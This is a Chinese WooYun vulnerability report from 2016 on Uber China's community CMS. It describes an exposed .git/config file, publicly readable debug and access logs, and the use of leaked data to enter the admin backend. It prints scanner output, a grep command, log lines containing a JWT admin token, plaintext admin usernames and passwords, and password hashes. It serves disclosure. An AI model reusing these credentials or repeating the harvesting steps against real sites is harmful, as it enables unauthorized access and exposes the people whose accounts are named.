乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-21: 细节已通知厂商并且等待厂商处理中 2016-04-22: 厂商已经确认,细节仅向厂商公开 2016-05-02: 细节向核心白帽子及相关领域专家公开 2016-05-12: 细节向普通白帽子公开 2016-05-22: 细节向实习白帽子公开 2016-06-06: 细节向公众公开
Uber社区存在多个漏洞,可进入系统后台,可执行任意SQL,影响8W会员dig www.uber.com.cn , 解析结果和uber主站在同一IP上
#0 影响描述dig ubernihao.comdig uber.com.cn记录显示,部署在同一个网络内部#1 .git 文件导致整站源码泄露
python wyspider.py http://cms.ubernihao.com--------------------------------------------------* scan http://cms.ubernihao.com start--------------------------------------------------[200] http://cms.ubernihao.com => http://cms.ubernihao.com/[200] http://cms.ubernihao.com/login.html => http://cms.ubernihao.com/login.html[200] http://cms.ubernihao.com/.git/config => http://cms.ubernihao.com/.git/config--------------------------------------------------* scan complete...--------------------------------------------------{ "dirs": { "http://cms.ubernihao.com": [ "http://cms.ubernihao.com/" ] }, "files": { "http://cms.ubernihao.com": { "/.git/": [ "http://cms.ubernihao.com/.git/config" ], "/": [ "http://cms.ubernihao.com/login.html" ] } }}
http://cms.ubernihao.com/.git/config
[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true[remote "origin"] fetch = +refs/heads/*:refs/remotes/origin/* url = [email protected]:muzhibuluo/uber_cms_v2.git[branch "master"] remote = origin merge = refs/heads/master
#2 系统调试日志、错误日志、访问日志可远程访问http://code.ubernihao.com/logs/
Index of /logs/../access.log 21-Apr-2016 06:32 357Mdebug.log 21-Apr-2016 06:32 440Mdebug.log-2016-04-13 13-Apr-2016 09:42 71Kdebug.log-2016-04-14 14-Apr-2016 17:34 174Kdebug.log-2016-04-15 16-Apr-2016 15:59 293Mdebug.log-2016-04-16 17-Apr-2016 15:59 260Mdebug.log-2016-04-17 18-Apr-2016 08:16 152Mdebug.log-2016-04-18 19-Apr-2016 15:59 129Mdebug.log-2016-04-19 20-Apr-2016 09:28 85Mdebug.log-2016-04-20 21-Apr-2016 04:01 92Merror.log 21-Apr-2016 06:32 329Minfo.log 21-Apr-2016 06:32 685M
#3 日志泄露大量敏感信息用户的访问TOKEN,登录密码信息
[2016-04-13 16:21:26.008] [INFO] http - 116.23.126.182 - - "PUT /adminUsers/1?authorization=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6MSwidHlwZSI6ImxvY2FsIiwiaWF0IjoxNDYwNTM1NjcwLCJleHAiOjE0NjI2MDkyNzB9.dscvgrWIzwL-Kl_jeElfAes93RLGRC3gG4nxa2BwTzU HTTP/1.0" 200 196 "http://cms.ubernihao.com/index.html" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.76 Mobile Safari/537.36"[2016-04-13 16:21:26.046] [DEBUG] mysqlDb - query sql : select id,email,nickname,cities,level,create_time as createTime from admin_user where level>=:level { level: '0' }[2016-04-13 16:21:26.047] [DEBUG] mysqlDb - formatedSql: select id,email,nickname,cities,level,create_time as createTime from admin_user where level>='0'[2016-04-13 16:21:26.049] [DEBUG] mysqlDb - operator back rows length : 1[2016-04-13 16:21:26.050] [INFO] http - 116.23.126.182 - - "GET /adminUsers/manage?cities=*&level=0 HTTP/1.0" 304 - "http://cms.ubernihao.com/index.html" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.76 Mobile Safari/537.36"[2016-04-13 16:21:37.959] [ERROR] app.js - NoUnauthorizationHeader /adminUsers?email=muzhi&passwd=uber undefined undefined undefined undefined
明文密码传输获取
cat debug.log-2016-04-16 | grep passwd[2016-04-17 00:48:14.330] [ERROR] app.js - NoUnauthorizationHeader /adminUsers?email=muzhi&passwd=ubernihao undefined undefined undefined undefined[2016-04-17 00:48:14.334] [DEBUG] mysqlDb - query sql : select id,email,nickname,passwd,cities,level,status,create_time,create_by,update_time,update_by from admin_user where 1=1 and email='muzhi' and passwd='f1a89ad1f8388af2fe5b99ee07d2f468' order by id desc[2016-04-17 00:48:14.336] [INFO] http - ::ffff:127.0.0.1 - - "GET /adminUsers?email=muzhi&passwd=ubernihao HTTP/1.1" 200 270 "" "undefined"[2016-04-17 14:31:32.614] [ERROR] app.js - NoUnauthorizationHeader /adminUsers?email=gz01&passwd=gz0101 undefined undefined undefined undefined[2016-04-17 14:31:32.618] [DEBUG] mysqlDb - query sql : select id,email,nickname,passwd,cities,level,status,create_time,create_by,update_time,update_by from admin_user where 1=1 and email='gz01' and passwd='e6144bda3a2f257ac9b59c9007bd9dbb' order by id desc[2016-04-17 14:31:32.620] [INFO] http - ::ffff:127.0.0.1 - - "GET /adminUsers?email=gz01&passwd=gz0101 HTTP/1.1" 200 260 "" "undefined"
#4 利用调试信息里面找到的用户信息进入后台
加强安全意识,就这样
危害等级:中
漏洞Rank:10
确认时间:2016-04-22 04:54
谢谢您提供的信息,我们正在尽快处理中
暂无